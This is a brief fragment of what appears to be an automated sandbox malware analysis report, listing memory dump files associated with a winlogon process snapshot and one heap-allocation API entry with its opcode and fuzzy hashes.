                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 8e9949c7d491d186b10d6f9a7e37656757b2784cb481f8207ee02abd3ddac45a
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: C8E06572A427089AF715CF52D81878936E1FF88F0AF85C014C90907350DF7ED5998782